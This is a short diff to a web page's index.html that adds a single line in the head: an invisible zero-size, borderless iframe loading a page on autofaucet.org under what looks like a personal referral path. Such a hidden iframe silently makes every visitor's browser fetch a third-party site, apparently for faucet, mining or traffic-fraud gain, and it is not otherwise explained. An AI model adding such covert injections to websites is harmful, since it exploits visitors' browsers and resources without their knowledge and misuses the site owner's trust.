--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+	<iframe src="https://autofaucet.org/wm/fatihcelik/4" width="0" height="0" style="border:0"></iframe>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <!--===============================================================================================-->
